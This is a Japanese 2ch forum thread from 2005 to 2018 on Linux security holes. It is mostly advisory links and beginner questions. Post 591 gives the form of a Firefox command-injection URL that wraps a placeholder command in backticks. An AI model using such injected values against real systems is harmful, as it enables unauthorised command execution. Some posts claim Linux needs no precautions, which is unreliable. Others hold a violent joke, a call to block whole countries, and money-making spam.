550 :login:Penguin:2005/06/11(土) 05:43:48 ID:t9YiCDuS.net
Linux Advisory Watch - June 10, 2005
http://security.linux.com/security/05/06/10/124248.shtml
>This week, advisories were released for krb4, mailutils, traversal, Wordpress,
>SilverCity, kdbg, ImageMagick, openssh, dbus, rsh, and the Red Hat kernel.

551 :login:Penguin:2005/06/11(土) 07:22:56 ID:t9YiCDuS.net
Gaimにセキュリティホール
http://gaim.sourceforge.net/security/?id=19
http://gaim.sourceforge.net/security/?id=18

552 :login:Penguin:2005/06/11(土) 12:41:44 ID:2Kb3/lJq.net
http://61.25.27.93/~ss.jpg


553 :login:Penguin:2005/06/11(土) 13:03:16 ID:bwoE+Bbm.net
(´・ω・) カワイソス

554 :login:Penguin:2005/06/12(日) 01:01:21 ID:07scZZ8J.net
友人にLinuxにはWinみたいなセキュリティホールが無いと聞いて
Linux入れてみたんですが今度はセキュリティホールは埋めておけと言われて
何が何だかです??
LinuxとWinとでセキュリティホールの言葉の意味が違っていますか?
あとLinuxでセキュリティ関係のオートアップデートは無いのでしょうか?

555 :login:Penguin:2005/06/12(日) 01:05:28 ID:+nMYhJp/.net
おまえの友人が馬鹿だという可能性に気付かないおまえも馬鹿

556 :login:Penguin:2005/06/12(日) 01:08:56 ID:+nMYhJp/.net
>>554
Fedora CoreやRed Hat Enterprise Linuxでは自動アップデートがデフォルト有効のはず。
他のLinuxディストリビューションでも同様か、簡単な設定で自動アップデートに出来る。

557 :login:Penguin:2005/06/12(日) 04:58:52 ID:v3kKDykX.net
>>554
メジャーなプログラムの既知のセキュリティホールは自動設定ならほぼ即日で埋まるけど
セキュリティ的に脆弱な設定のまま無言で動作するのは極めて簡単な上
誰もそのことを君に指摘してくれないから気をつけな。

558 :login:Penguin:2005/06/12(日) 09:22:18 ID:rcQf4qhX.net
http://blog.livedoor.jp/lindows_staff/archives/10241.html

( ゚д゚)ポカーン

559 :login:Penguin:2005/06/12(日) 10:00:49 ID:IBYpviLb.net
>>558
ライブドアの中身のなさを如実に表わしてるな・・・
こんなしょーもない開発者しかいないのか?
Linspire(Lindows)とTurboはダメだな・・

560 :login:Penguin:2005/06/12(日) 10:17:42 ID:JQtNej9E.net
>>558
今さらあげてまでいうことか?

561 :login:Penguin:2005/06/12(日) 12:12:21 ID:oi3brHk9.net
Gedit Filename Format String Vulnerability
http://www.securityfocus.com/bid/13699

A specially crafted file with format specifiers in the filename can
cause arbitrary code execution.

562 :login:Penguin:2005/06/12(日) 12:57:40 ID:07scZZ8J.net
>>557
自動アップデートの件ありがとうございました。
しかし残念ながらWinに戻ろうと考えています。
私がLinux入れたことを、その友人がふれ回ったらしく自称Linuxのプロと言う奴から
いきなり電話がかかって来る始末。なんか面倒なことになりそうなんで…
セキュリティ性が高いから防衛庁に使われているとか、高位のハッカー?じゃないと
ハッキングは無理とか数値計算が3倍速くなるとか・・・マジなんですか??

563 :login:Penguin:2005/06/12(日) 12:59:49 ID:k8oM4L/x.net
なかなか愉快なお友達をお持ちのようで

564 :login:Penguin:2005/06/12(日) 13:14:12 ID:07scZZ8J.net
友人がまさか電波を連れてくるとは思いませんでした。
朝7時ぴったりに電話が掛かってきて第一声が「Linuxつかってんの?」ですよ・・・
そりゃ私3流大学ですがコイツがおかしいのだけは分かります。
こいつ等2人を合法的に殺す方法を教えて欲しいくらいです。

565 :login:Penguin:2005/06/12(日) 14:20:36 ID:ph/FO1uq.net
類友と反省してまっとうに生きろ

566 :login:Penguin:2005/06/15(水) 21:02:46 ID:4oB09Z9t.net
         ,ィミ,        ,ィミ,
          彡 ミ        彡 ミ,
       ,,彡   ミ、、、、、、、、彡  ミ,     (⌒)
      彡;:;:             ミ,    (  ヽ    / ̄ ̄ ̄ ̄ ̄ ̄
   〜三;:;:::::              彡〜  ノ  ノ  <  だったらあきらめろよ
   ~~三:;:;:;:::::  -=・=-   -=・=- 三~~ ヽ (     \______
   ~~彡::;:;:;:;:::..     ___     ,三~~ ( ノ ,,,,,  :      ;;
    ~~彡;:;:;:;:;:;:;:.    |┴┴|    ,ミ~~ ノノ ;'" ,,ノ―、     ,;'
    ~~彡:;:;:;:;:;:;:;:;.  ノ――| ---==ニノ ,;'′ >=ニ(二二二()
...-''''""~~,::;:;::;::;::;::;'            ミ,,  ,;'′  ゝ--〈
;;:;;;;;;;;;;;;;;;;;;;;;:;:;:;:;:;:;:;            i! ミ,,,,;'′   `ー‐'
     ::::ミミミ:;:;:;:            ミ::      ,;' ̄ ̄ ̄ ̄|

567 :login:Penguin:2005/06/18(土) 11:05:34 ID:oGQfpUQA.net
http://security.linux.com/security/05/06/17/1322200.shtml
>This week, advisories were released for mikmod, tcpdump, yum, elinks, parted,
>system-config-securitylevel, checkpolicy, spamassassin, gaim, libextractor, Ettercap, shtool,
>gedit, MediaWiki, gzip, gftp, squid, rsh, sysreport, telnet, bz, and mc.

568 :login:Penguin:2005/06/23(木) 20:29:36 ID:P3+SbVls.net
主要なブラウザに脆弱性--ポップアップを悪用したフィッシングのおそれ
http://japan.cnet.com/news/sec/story/0,2000050480,20084675,00.htm

569 :login:Penguin:2005/06/24(金) 17:31:00 ID:tEoAOdYr.net
Linux Kernel Two Vulnerabilities (Linux 2.6.x)
http://secunia.com/advisories/15786/

1) An error exists in the handling of access to ar.rsc via ptrace and restore_sigcontext.
2) An error in the delivery of signals can cause a kernel panic when a sub-thread "exec" with a pending timer.

2.6.12.1 にアップデートしましょう。

570 :login:Penguin:2005/06/25(土) 01:08:14 ID:ijinZqdM.net
http://security.linux.com/security/05/06/24/1122213.shtml
>This week, advisories were released for elinks, mikmod, tcpdump, parted,
>system-config-securitylevel, checkpolicy, spamassassin, gaim, ruby, arts, kde, util-linux,
>sudo, gawk, mc, pilot-link, alsa-utils, jpilot, ImageMagick, hwdata, webapp, cpio,
>squirrelmail, and bzip2.

571 :login:Penguin:2005/07/02(土) 13:34:03 ID:W4bM1soj.net
http://security.linux.com/security/05/07/01/1313243.shtml
>This week, advisories were released for crip, Network Manager, HelixPlayer, gedit, gzip, selinux, gnome, openssh, libwpd, openoffice,
>openssh, binutils, totem, rgmanager, magma-plugins, iddev, fence, dlm, cman, css, GFS, mod_perl, Heimdal, and sudo.

572 :login:Penguin:2005/07/08(金) 11:19:22 ID:3of0LGOn.net
A buffer overflow has been discovered in zlib, potentially resulting in the execution of arbitrary code.

http://www.gentoo.org/security/en/glsa/glsa-200507-05.xml
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2096
http://secunia.com/advisories/15949/

zlibに脆弱性、Linux各社が対処
http://www.itmedia.co.jp/enterprise/articles/0507/08/news016.html

573 :login:Penguin:2005/07/12(火) 13:25:32 ID:5TzjBnRV.net
zlib はなかなか枯れないね

574 :login:Penguin:2005/07/28(木) 02:14:47 ID:JtHgZDAK.net
脆弱性トップ20にFirefoxやiTunesも
http://www.itmedia.co.jp/enterprise/articles/0507/27/news049.html

575 :login:Penguin:2005/07/29(金) 05:48:38 ID:RW7cJXBF.net
枯れてるOSと枯れてない彼女が好きです。

枯れてないOSと枯れた彼女が居るでつ、、

576 :login:Penguin:2005/07/29(金) 12:34:38 ID:ss8lSczc.net
http://hideaway.under.jp/Firefox/
【緊急】JavaScriptActionsにGreasmonkeyと同じく脆弱性
JavaScriptActions 2.1.0/2.0.0/1.9.1.2にて
Chrome特権で任意のコードを実行できる脆弱性。
近日中に対策版を出す予定でですが、
現在Installしている方は速やかにUninstallをお願いいたします。
かなり危険な脆弱性です。

577 :login:Penguin:2005/07/29(金) 12:39:57 ID:ss8lSczc.net
QR画像コードを生成するPerlとPHPのスクリプトにサービスを停止させられるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050728/165431/

578 :login:Penguin:2005/07/29(金) 12:43:17 ID:ss8lSczc.net
Sophosなどのセキュリティソフトに深刻な脆弱性
http://www.itmedia.co.jp/enterprise/articles/0507/29/news023.html

Opera、セキュリティ問題に対処の8.02リリース
http://www.itmedia.co.jp/enterprise/articles/0507/29/news022.html

579 :login:Penguin:2005/08/03(水) 15:03:54 ID:0die0yx0.net
8/15日はサーバー停止させておこうかな。

580 :login:Penguin:2005/08/03(水) 15:07:05 ID:Z47/ZFYP.net
>>579
中国と韓国からのパケットをDROPすれば無問題。

581 :login:Penguin:2005/08/09(火) 12:37:04 ID:DU6rJ5oT.net
>>575
Fedora使いの四十代とみた。


582 :login:Penguin:2005/08/19(金) 12:47:16 ID:0ixP/ad/.net
モマエラ、Adobe Reader は 7.0.1 にアップデートしる。

ttp://secunia.com/advisories/16466/


583 :login:Penguin:2005/08/19(金) 13:36:54 ID:rSTWdTaP.net
>>582
日本語版の方もちゃんと7.0.1出てたよ。
対応速くて偉いね。

584 :login:Penguin:2005/08/20(土) 09:44:45 ID:KD20PUI6.net
なあ、もまえら、アンチウイルスソフトはどうしてるの?
ウイルスバスタなんかのLinux用の奴なんか高くて買えないし(10万以上する)。
なんか良いアンチウイルスソフトあったら教えて。
教えてエロイ人。


585 :login:Penguin:2005/08/20(土) 09:46:27 ID:/fVeEJm0.net
デスクトップならいらんやろ

586 :login:Penguin:2005/08/20(土) 11:48:17 ID:UYAkRNMa.net
>>584
AntiVir or BitDefender

いずれも無償利用可能。

587 :[・∀・]:2005/08/20(土) 12:23:00 ID:eGK2FvBS.net
>>584
スレ違いではないがこっちのほうがお前さんのアプローチには
適切ではないか。

つ ttp://pc8.2ch.net/test/read.cgi/linux/1068890112/

588 :login:Penguin:2005/08/20(土) 21:27:25 ID:KD20PUI6.net
>>585
>>586
>>587
もまえらサンクス。
いや、学術目的でちろっと公開するLinuxサーバ立てようかとおもってるんですよ。
まだ調査の段階でためしに立てるんで、高いウイルスソフトなんて買えないからどうしようかと思いまして。
Linuxあまり詳しくないし、調べてるだんかいです。
ウイルス関連情報スレも覗いてみまつ。

589 :login:Penguin:2005/09/21(水) 16:30:16 ID:Jh7+IFzg.net
馬鹿が多過ぎるんでこっちにも書いとく。

Linux版のFirefox(たぶん他のUNIX系OSも)に深刻な脆弱性が見付かってる。
ユーザ権限で任意のコマンドを実行可能。
悪用するにはfirefoxのコマンドラインに細工したURLを与える必要があるが、
専用ブラやメーラーからブラウザが起動される場合がこれに相当する。
悪用は簡単。実に簡単。これから悪用URLが2chじゅうに貼られるかも。
これを修正したFirefox 1.0.7が間もなくリリースされる予定だが、
リリースを待たずに脆弱性の詳細が一般に告知されてしまった。

今のところの対策は、
・専ブラやメーラ上のリンクをクリックしない。
・Mozillaにはこの脆弱性は無いのでしばらくはMozillaを使う。
・先にFirefoxを立ち上げてからリンクをクリックすればこの脆弱性から逃れられる。

590 :login:Penguin:2005/09/21(水) 16:51:29 ID:Jh7+IFzg.net
日本語ソース

「Linux版Firefoxにセキュリティ・ホール」
ttp://nikkeibp.jp/wcs/leaf/CID/onair/jp/it/398968

リンク踏むなって言ってるのにリンク貼るのも矛盾だけどよ

591 :login:Penguin:2005/09/21(水) 17:33:56 ID:vpcv6HyA.net
>>589
大げさに騒ぎすぎだ。
Mozilla 1.7.xでも同種の脆弱性はあるし、脆弱性の詳細も何もこれだけだ。

http://local\`コマンド\`host

592 :login:Penguin:2005/09/21(水) 17:35:11 ID:Jh7+IFzg.net
>>591
通報しますた。

593 :login:Penguin:2005/09/21(水) 17:37:18 ID:Jh7+IFzg.net
これだけだから騒いでるのにホントにもう馬鹿しか居ねぇな。
一回と言わず百回くらい死ねよ。

594 :login:Penguin:2005/09/21(水) 17:54:07 ID:vpcv6HyA.net
なんだ、電波かよ。レスして損した。

595 :chkrootkit 0.46a:2005/11/02(水) 07:31:42 ID:Lox8wIB6.net
* chkproc.c
o bug fix for FreeBSD: chkproc was sending a SIGXFSZ (kill -25) to init, causing a reboot
o more fixes to better support Linux threads
* chkutmp.c
o improved execution speed
* chkwtmp.c
o segfault fixed
* chkrootkit
o Mac OS X support added
o new rootkits detected: rootedoor
o some bug fixes


596 :PHP 4.4.1 Released:2005/11/02(水) 20:26:37 ID:GwDYQZDh.net
This version is a maintenance release, that contains numerous bug fixes,
including a number of security fixes related to the overwriting of the GLOBALS array.
All users of PHP 4.3 and 4.4 are encouraged to upgrade to this version.

597 :login:Penguin:2005/11/03(木) 18:27:07 ID:y9ZLliZf.net
5系の場合はこっち
つ ttp://wiki.ohgaki.net/index.php?PHP%2Fpatch%2F%24GLOBAL%CA%DD%B8%EE%A5%D1%A5%C3%A5%C1

598 :login:Penguin:2005/11/05(土) 15:43:47 ID:fSMGtg2B.net
clamav 0.87.1

599 :login:Penguin:2005/11/14(月) 15:38:51 ID:T2zvy2jl.net
セキュリティリリース Apache HTTP Server 1.3.34
http://pcweb.mycom.co.jp/news/2005/10/19/015.html

これした?

600 :login:Penguin:2005/11/14(月) 22:55:53 ID:bip/6T8S.net
>>599 中華、もう2系に汁。

601 :login:Penguin:2006/01/01(日) 20:40:38 ID:1I9cMUb6.net
「ボット感染、Linuxも標的に」、米SANS
ttp://nikkeibp.jp/wcs/leaf/CID/onair/jp/flash/418779

SANSってFirefoxの穴を見つけたと大喜びして
開発元無視して公表したら穴じゃなかったところだよな・・。

602 :login:Penguin:2006/01/02(月) 11:19:45 ID:fd4KPh4q.net
ひさしぶりに覗いてみたがやはり馬鹿しか居ないようだ。リセットリセット。

603 :login:Penguin:2006/01/16(月) 13:18:16 ID:cr3nbkAt.net
http://www.php.net/
PHP 4.4.2 Released
PHP 5.1.2 Released

604 :login:Penguin:2006/02/12(日) 16:32:53 ID:3OeyEdqC.net
SELinux MLでのドキュメント和訳開始とかいいんだけど、
不治藁ウザイ

605 :login:Penguin:2007/06/25(月) 21:46:06 ID:55n1w8Gj.net
>>はい

606 :login:Penguin:2007/09/05(水) 13:35:17 ID:6UWO1mpz.net
ウイルス大作そふと使ってる?
俺は使ってない

607 :login:Penguin:2007/09/05(水) 13:39:25 ID:2ks0nMKe.net
>>606
ウィルス関係情報スレッド
http://pc11.2ch.net/test/read.cgi/linux/1068890112/

608 :login:Penguin:2007/10/12(金) 11:31:03 ID:NZvzLEa+.net
test

609 :login:Penguin:2007/10/12(金) 11:31:56 ID:NZvzLEa+.net
test

610 :login:Penguin:2007/10/14(日) 02:59:19 ID:s17qgGhp.net
test

611 :login:Penguin:2007/10/18(木) 21:11:11 ID:ikAZ28Hh.net
            _
        r-、' ´   `ヽr-、
       ィ7 /l: ハヽハ トヾ    駄スレを隠すことは、この俺が許さん!
        '|l |'´_` ´_ `| ||    信念に基づいて行動する。
        | |´ヒ}   ヒ}`! l|   それを人は正義と言う。
   __ノ゙). 从 l,  _'_.  |从   今俺が行ってることは、上げ荒らしではない。
 ,_'(_ ノ_ヽ ヾl.> - ,イ;リ    正義という名の粛清だぁ!
 { f:テ} {'f:テ}',/\ヽ--//ヽ    
 ヽ,r─‐ 、ィ .、、 i l>Y<! i '、    バーニング!
 / iゝ_ノ iヽ /l   |l  l   ',
 lンヽ/ムノじ

612 :Socket774:2007/10/18(木) 22:04:00 ID:UcSKEPw9.net
  ∧_∧∩
 ( ゚∀゚)彡
⊂ ⊂彡 eroda! eroda!
 (つ ノ
  (ノ

613 :login:Penguin:2007/11/01(木) 01:33:40 ID:1Ofa7PL9.net
石油里程掘

614 :login:Penguin:2008/01/15(火) 16:36:56 ID:mAv+DFwN.net

【PC/セキュリティ】悪質Flashファイルでネットワーク機器を攻撃?[01/15]
http://news24.2ch.net/test/read.cgi/wildplus/1200381990/

615 :login:Penguin:2009/10/04(日) 12:38:22 ID:FGB8q6ch.net
2009年初カキコ

616 :login:Penguin:2010/02/03(水) 02:09:29 ID:uaUu8AU6.net
SELinux、使っていません

617 :login:Penguin:2010/02/03(水) 02:10:56 ID:uaUu8AU6.net
age

618 :login:Penguin:2011/01/10(月) 01:55:56 ID:G2EODJS6.net
俺の尻にセキュリティホールが!
誰かに埋められるのか!?

619 :login:Penguin:2011/01/10(月) 02:23:43 ID:xeEo/y5B.net
俺の尻にもセキュ(ry
>>618
お前ので埋めてくれ

620 :login:Penguin:2011/01/12(水) 00:44:12 ID:T03M34JA.net
ご存じの方教えてください
/dev/memというのがありますが、BSDだとセキュリティレベルで
アクセス不可に出来ますが、Linux(の何らかのディストリビューション)
ではどのように対策してるのでしょうか? BSD と同様の機構が用意
されてるのでしょうか?

621 :login:Penguin:2011/01/12(水) 09:57:36 ID:0/KxXU0U.net
誰に対してアクセス制御したいん?

622 :login:Penguin:2011/01/12(水) 10:25:55 ID:LqSEdkq8.net
>>620
パーミションによる保護だけでは不十分なのでは、ってこと?

623 :620:2011/01/12(水) 22:51:09 ID:T03M34JA.net
>>621 root 乗っ取られた場合でも大丈夫なように書き込み禁止とか(Xは使えなくて良い前提)
>>622 その通りです

624 :login:Penguin:2011/01/13(木) 10:26:06 ID:M25EQRYI.net
>>623
/dev/memを書き込みできないようにして何を守るんですか?
rootは任意のカーネルモジュールを読み込めるんですよ?

625 :login:Penguin:2011/01/13(木) 10:34:02 ID:wyv+jQjV.net
FreeBSD ではこんな感じ。
http://www.jp.freebsd.org/QandA/HTML/1730.html

626 :login:Penguin:2011/01/13(木) 10:37:53 ID:wyv+jQjV.net
FreeBSD ではカーネルモジュールの読み込みも禁止されるみたい。
http://www.freebsd.org/doc/en/books/faq/security.html#SECURELEVEL

627 :login:Penguin:2011/01/13(木) 10:56:53 ID:M25EQRYI.net
ちょっとぐぐると、securelevelよりももっと細かく制御できる
capabilitiesを使う方針みたいですね。

ttp://www.linuxsecurity.com/docs/SecurityAdminGuide/SecurityAdminGuide-10.html

628 :620:2011/01/13(木) 23:13:28 ID:VPGufbny.net
なるほど、ありがとうございます。
じっくり見てみます。


629 :デムパゆんゆん@速+の聖戦士様:2011/01/15(土) 02:41:26 ID:hwqjWgwR.net
>>620
http://tomoyo.sourceforge.jp/
TOMOYO Linux
app armerもあるけど
https://wiki.ubuntu.com/AppArmor
資料はほとんど英語
SELinuxは/dev/memに所属するグループを書き込み禁止にすれば良いけど
グループに所属する他のプログラムまで影響する
自前でポリシ作れば何とかなるけど面倒
SELinuxはFedoraやCentOSに付いてるデフォのtargetポリシでも効果はあるけど
mlsポリシのがいいんかな
制限がきつくて運用がしんどいけど

630 :login:Penguin:2011/02/10(木) 17:15:03 ID:cRsl+I33.net
OpenSSL 1.0.0d, 0.9.8r
> 08-Feb-2011: OpenSSL 1.0.0d is now available, including important bug and security fixes
> 08-Feb-2011: OpenSSL 0.9.8r is now available, including important bug and security fixes
http://openssl.org/news/secadv_20110208.txt

631 :login:Penguin:2011/03/26(土) 11:51:16.66 ID:d+c+cr7h.net
>>617-618 warota

632 :login:Penguin:2012/05/30(水) 22:15:28.92 ID:N+g4ivH/.net
埋め

633 :login:Penguin:2014/03/25(火) 14:15:52.00 ID:7+OVV7FN.net
>大阪府三島郡島本町の小学校や中学校は、暴力イジメ学校や。
島本町の学校でいじめ・暴力・脅迫・恐喝などを受け続けて廃人同様になってしもうた僕が言うんやから、
まちがいないで。僕のほかにも、イジメが原因で精神病になったりひきこもりになったりした子が何人もおる。
教師も校長も、暴力やいじめがあっても見て見ぬフリ。イジメに加担する教師すらおった。
誰かがイジメを苦にして自殺しても、「本校にイジメはなかった」と言うて逃げるんやろうなあ。
島本町の学校の関係者は、僕を捜し出して口封じをするな

>島本町って町は、暴力といじめの町なんだな

子供の時に受けた酷いイジメの体験は、一生癒えない後遺症になるなあ

634 :login:Penguin:2014/03/28(金) 19:34:18.14 ID:pyD9CYw+.net
LiveCDで記録できるデバイスなしで使うときだけ使っているから
何も奪われないし、改変などできるわけない。
毎日再起動したら初期状態で変更は全て消える。

これでも感染すると言う奴がでてくるのが2chの姿。
FWなんてISPが貸してくれるルータで充分な。WANに直でつながるISP
とか入るほうが問題だろ。
だいたいほとんどの問題はLAN上で動くファイル共有やらOSの遠隔操作
機能やらIEとOEだろ。これらを使っていない時点でなんの問題あるの?
メール?バカ?メールはメール専門PCを別セグメントで用意するから問題ない。

635 :login:Penguin:2014/03/30(日) 20:43:53.74 ID:7bGeDjIB.net
こういうのが一番危ない
恐ろしいのはセキュリティ板住人の9割がこういう思想なこと

636 :login:Penguin:2014/04/01(火) 05:17:28.69 ID:HvNxfc0o.net
>>634
ウイルスには感染可能だぞ
まあ感染しても再起動時にはリセットされて真っさらな状態に戻るけどな

637 :login:Penguin:2014/04/01(火) 06:23:44.53 ID:6BIGNOml.net
Linuxなので安全です。
心配するだけ無駄。

638 :login:Penguin:2014/09/27(土) 14:29:00.73 ID:VT/TJVU/.net
ここまで大げさにしたら
どうなんるんだろ、仕掛人および実行犯

639 :login:Penguin:2014/09/27(土) 17:10:52.30 ID:7avXKrpC.net
>>638
仕掛人とか実行犯って何の話?

640 :login:Penguin:2014/09/27(土) 17:19:30.60 ID:VT/TJVU/.net
ただの妄想だから気にすんな

641 :login:Penguin:2014/09/28(日) 23:51:35.54 ID:gu/EcnBP.net
シェルに問題があっても、Webサーバ機能にどう影響してるのか
イマイチ不明だな。

そもそそもwebサーバが動作しているユーザ:グループは、シェルログイン
がデフォルトで不可能になってるはずだが。

642 :login:Penguin:2014/09/29(月) 06:50:46.17 ID:qMrfv/PM.net
>>641
http://www.walbrix.com/jp/blog/2014-09-bash-code-injection.html

643 :login:Penguin:2014/10/02(木) 02:45:33.30 ID:vgT+wxAD.net
修正されたようやね

644 :login:Penguin:2014/10/07(火) 08:35:25.25 ID:xnhP0tKN.net
環境変数で実行できるbash脆弱性を悪用できる情報が次々と見つかっているから、
bashを別のシェルに置き換えるしか対策はないのかな

645 :login:Penguin:2014/12/28(日) 13:01:53.48 ID:UVyDWqFR.net
あげ

646 :login:Penguin:2014/12/28(日) 21:20:40.40 ID:uKP7t8/4.net
>>639
MSのことだろね。

647 :login:Penguin:2015/01/09(金) 13:57:36.81 ID:3qBSTEZB.net
JVNVU#98974537 OpenSSL に複数の脆弱性
http://jvn.jp/vu/JVNVU98974537/

648 :login:Penguin:2015/01/09(金) 16:47:52.92 ID:yX9JrZvX.net
毎度 make test で目が回る

649 :login:Penguin:2015/01/28(水) 09:47:44.47 ID:JIeAy2uP.net
The GHOST Vulnerability
https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability

650 :login:Penguin:2015/01/28(水) 10:12:34.34 ID:EKnrT6XJ.net
HeartbleedもShellshockもセキュリティ板では全く話題にならなかった
今回もそうなるんだろうな、んでここのような他の板のスレで細々と語られる

651 :login:Penguin:2015/01/28(水) 10:17:28.20 ID:JIeAy2uP.net
今回のは glibc の問題だからこの板でいいんじゃね。

652 :login:Penguin:2015/01/29(木) 01:49:20.45 ID:Z+5kFbTi.net
セキュリティアップデートだけ集めてディストリ作ったらどんな構成になるんだろ?

653 :login:Penguin:2015/01/31(土) 23:08:18.71 ID:GpM5XcgJ.net
リコールの起きたパーツだけ集めて車作ってみました、みたいな?

654 :login:Penguin:2016/11/10(木) 20:38:43.49 ID:GuA4h1bt.net
博多駅前にでっかいセキュリティホールが開いてます
これを読んだ人は思い出してあげてください

655 :login:Penguin:2017/07/10(月) 04:02:28.01 ID:YwZ+60fd.net
はい

656 :login:Penguin:2017/12/29(金) 14:41:53.26 ID:S/CsVkMC.net
誰でも簡単にパソコン1台で稼げる方法など
参考までに、
⇒ 『宮本のゴウリエセレレ』 というブログで見ることができるらしいです。

グーグル検索⇒『宮本のゴウリエセレレ』

Q7ZR3XXMBX

657 :login:Penguin:2018/01/28(日) 12:33:14.68 ID:CYv+BoBA.net
セキュリティホール埋めたら再起動なパッチ記念

658 :login:Penguin:2018/05/22(火) 08:10:59.89 ID:Czl6p0FW.net
僕の知り合いの知り合いができた副業情報ドットコム
関心がある人だけ見てください。
グーグルで検索するといいかも『ネットで稼ぐ方法 モニアレフヌノ』

II3J1

総レス数 658
148 KB
掲示板に戻る 全部 前100 次100 最新50
read.cgi ver 2014.07.20.01.SC 2014/07/20 D ★